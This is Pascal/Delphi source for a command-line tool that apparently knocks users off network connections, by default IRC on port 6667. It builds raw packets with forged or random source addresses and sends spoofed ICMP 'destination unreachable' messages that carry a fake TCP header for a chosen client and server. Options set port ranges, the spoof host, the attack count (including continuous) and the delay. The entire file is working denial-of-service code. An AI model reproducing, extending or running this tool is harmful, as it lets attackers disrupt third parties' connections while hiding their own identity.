unit u_main;

interface

uses
  u_winsck2, u_sysutils, u_sockhdr;

type
  TPortType = (TClient, TServer);
  TSinOpt = packed record
    CliPrt1, CliPrt2, SrvPrt1, SrvPrt2: Word;
    Delay, Num, Sended, SrvIP, SpoofIP: Cardinal;
    HedefAdres: TSockAddrIn;
    ICMPType, ICMPCode: Byte;
    RandomSeek: Int64;
    Socket: TSocket;
  end;

var
  SinOpt: TSinOpt;

  function GetRandomIP: Cardinal;
  function GetRandomValue(const Range: Integer): Integer;
  function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr;
    tolen: Integer): Integer;
  function Resolve(const host: PChar): Cardinal; 
  function ValidPort(const Port: string): Boolean;
  procedure CreateSocket;
  procedure SendSin(const CliPrt, SrvPrt: Word);
  procedure SendSin_FillICMPhdr;
  procedure SendSin_FillIPhdr1;
  procedure SendSin_FillIPhdr2;
  procedure SendSin_FillTCPhdr(const CliPrt, SrvPrt: Word);
  procedure SetDefaultOptions;
  procedure SetParams;
  procedure SetPorts(const PortType: TPortType; const Ports: string);
  procedure Usage(const Path: string);

implementation

function GetRandomIP: Cardinal;
var
  IPArray: array [0..3] of Byte;
  i: Integer;
begin
  for i := 0 to 3 do
    IPArray[i] := GetRandomValue(255) + 1;
  Move(IPArray, Result, Sizeof(Result));
end;

function GetRandomValue(const Range: Integer): Integer; // function for getting different random
begin                                                   // values between very short times
  Random;
  Inc(SinOpt.RandomSeek);
  Result := (Random(High(Integer)) + SinOpt.RandomSeek*$FFFF) mod Range;
end;

function Gonder(s: TSocket; var Buf; len, flags: Integer; var addrto: TSockAddr;
  tolen: Integer): Integer; // function for sending packet and for checking send error
var
  LastError: Integer;
begin
  WSASetLastError(0);
  Result := Sendto(s, Buf, len, flags, addrto, tolen); // send packet
  LastError := WSAGetLastError;
  if LastError <> 0 then
    Writeln('Unable to send sin packet. Error code: ' + InttoStr(LastError));
end;

function Resolve(const host: PChar): Cardinal; // function for resolving host to ip
var
  InAddr: TInAddr;
  HostEnt: PHostEnt;
begin
  InAddr.S_addr := inet_addr(host); // convert ip address format (ex: 127.0.0.1) to cardinal
  if InAddr.S_addr = INADDR_NONE then // if it is not a ip address then resolve it
  begin
    HostEnt := GetHostByName(host);
    if not Assigned(HostEnt) then // if couldn't resolve the host then exit
    begin
      Writeln('Error: Unable to resolve host: ' + host);
      Halt(0);
    end;
    Move((HostEnt^.h_addr_list^)^, InAddr.S_addr, HostEnt^.h_length); // move resolved host to InAddr.S_addr
  end;
  Result := InAddr.S_addr;
end;

function ValidPort(const Port: string): Boolean;
var
  prt: Integer;
begin
  prt := StrtoIntDef(Port, -1);
  Result := (prt > -1) and (prt < 65536);
end;

procedure CreateSocket; // procedure for creating a raw socket
begin
  SinOpt.Socket := Socket(AF_INET, SOCK_RAW, IPPROTO_RAW); // create a socket
  if SinOpt.Socket = INVALID_SOCKET then // exit if couldn't create a socket
  begin
    Writeln('Error on creating socket');
    Halt(0);
  end;
  if SetSockOpt(SinOpt.Socket, IPPROTO_IP, IP_HDRINCL, '1', 4) <> 0 then
  begin // if can't set the IP_HDRINCL option then exit
    Writeln('Error: IP_HDRINCL'#13#10 +
            '(Note that this program only works on Windows XP)');
    Halt(0);
  end;
end;

const
  Len = 56;

var
  Buf: array [0..(Len - 1)] of Char;
  IPhdr1: PIPhdr = @Buf[0];
  ICMPhdr: PICMPhdr = @Buf[20];
  IPhdr2: PIPhdr = @Buf[28];
  TCPhdr: PTCPhdr = @Buf[48];

procedure SendSin(const CliPrt, SrvPrt: Word);
begin
  FillChar(Buf, Sizeof(Buf), 0);
  SendSin_FillIPhdr1;
  SendSin_FillICMPhdr;
  SendSin_FillIPhdr2;
  SendSin_FillTCPhdr(CliPrt, SrvPrt);
  ICMPhdr.icmp_sum := CheckSum(@ICMPhdr^, Len - 20);
  Gonder(SinOpt.Socket, Buf[0], Len, 0, SinOpt.HedefAdres, Sizeof(SinOpt.HedefAdres));
end;

procedure SendSin_FillICMPhdr;
begin
  ICMPhdr.icmp_type := SinOpt.ICMPType;
  ICMPhdr.icmp_code := SinOpt.ICMPCode;
  ICMPhdr.icmp_id := htons(GetRandomValue(65535) + 1);
  ICMPhdr.icmp_seq := htons(GetRandomValue(65535) + 1);
end;

procedure SendSin_FillIPhdr1;
begin
  IPhdr1.ip_verlen := $45;
  IPhdr1.ip_tos := 60;
  IPhdr1.ip_len := htons(Len);
  IPhdr1.ip_id := htons(GetRandomValue(65535) + 1);
  IPhdr1.ip_ttl := 255;
  IPhdr1.ip_p := 1;
  if SinOpt.SpoofIP = 0 then
    IPhdr1.ip_src := GetRandomIP
  else
    IPhdr1.ip_src := SinOpt.SpoofIP;
  IPhdr1.ip_dst := SinOpt.HedefAdres.sin_addr.S_addr;
  IPhdr1.ip_sum := CheckSum(@IPhdr1^, 20);
end;

procedure SendSin_FillIPhdr2;
begin
  IPhdr2.ip_verlen := $45;
  IPhdr2.ip_len := htons(69);
  IPhdr2.ip_id := ntohs(40216);
  IPhdr2.ip_ttl := 10;
  IPhdr2.ip_p := 6;
  IPhdr2.ip_src := SinOpt.HedefAdres.sin_addr.S_addr;
  IPhdr2.ip_dst := SinOpt.SrvIP;
end;

procedure SendSin_FillTCPhdr(const CliPrt, SrvPrt: Word);
begin
  TCPhdr.tcp_src := htons(CliPrt);
  TCPhdr.tcp_dst := htons(SrvPrt);
  TCPhdr.tcp_seq := 1997;
  SinOpt.HedefAdres.sin_port := TCPhdr.tcp_dst;
end;

procedure SetDefaultOptions;
begin
  SinOpt.HedefAdres.sin_addr.S_addr := Resolve(PChar(ParamStr(1)));
  SinOpt.SrvIP := Resolve(PChar(ParamStr(2)));
  SinOpt.CliPrt1 := 1024;
  SinOpt.CliPrt2 := 4000;
  SinOpt.HedefAdres.sin_family:=AF_INET;
  SinOpt.ICMPType := 3;
  SinOpt.ICMPCode := 2;
  SinOpt.Num := 1;
  SinOpt.SrvPrt1 := 6667;
  SinOpt.SrvPrt2 := 6667;
end;

procedure SetParams;
var
  i: integer;
  pstr: string;
  Ch: Char;
begin
  for i := 3 to ParamCount do
  begin
    pstr := ParamStr(i);
    Ch := #0;
    if Length(pstr) = 2 then
    begin
      if pstr[1] = '-' then
        Ch := pstr[2];
    end;
    case Ch of
      'C': SetPorts(TClient, ParamStr(i + 1));
      'S': SetPorts(TServer, ParamStr(i + 1));
      't': SinOpt.ICMPType := StrtoIntDef(ParamStr(i + 1), 3);
      'c': SinOpt.ICMPCode := StrtoIntDef(ParamStr(i + 1), 2);
      's': SinOpt.SpoofIP := Resolve(PChar(ParamStr(i + 1)));
      'n': SinOpt.Num := StrtoIntDef(ParamStr(i + 1), 0);
      'd': SinOpt.Delay := StrtoIntDef(ParamStr(i + 1), 0);
    end;
  end;
end;

procedure SetPorts(const PortType: TPortType; const Ports: string);
  procedure ShowError;
  begin
    Writeln('Invalid port range: ' + Ports);
    Halt(0);
  end;
var
  i: integer;
  prt, Prt1, Prt2: string;
begin
  prt := Ports;
  i := Pos('-', prt);
  if i = 0 then
    ShowError;
  Prt1 := Copy(prt, 1, i - 1);
  Delete(prt, 1, i);
  Prt2 := prt;
  if not ValidPort(Prt1) or not ValidPort(Prt2) then
    ShowError;
  case PortType of
    TClient:
      begin
        SinOpt.CliPrt1 := StrtoInt(Prt1);
        SinOpt.CliPrt2 := StrtoInt(Prt2);
        if SinOpt.CliPrt1 > SinOpt.CliPrt2 then
          ShowError;
      end;
    TServer:
      begin
        SinOpt.SrvPrt1 := StrtoInt(Prt1);
        SinOpt.SrvPrt2 := StrtoInt(Prt2);
        if SinOpt.SrvPrt1 > SinOpt.SrvPrt2 then
          ShowError;
      end;
  end;
end;

procedure Usage(const Path: string);
begin
  Write(
        'usage: ' + Path + ' <client> <server> [options]'#13#10#13#10 +
        'Options:'#13#10 +
        '  -C:    Client port range (format: 1024-4000 (default))'#13#10 +
        '  -S:    Server port range (format: 6667-6667 (default))'#13#10 +
        '  -t:    ICMP type         (default 3)'#13#10 +
        '  -c:    ICMP code         (default 2)'#13#10 +
        '  -s:    Spoof host        (0 is random (default))'#13#10 +
        '  -n:    Num of attacks    (default 1) (0 is continuous)'#13#10 +
        '  -d:    Delay (in ms)     (default 0)'#13#10
       );
  Halt(0);
end;

end.
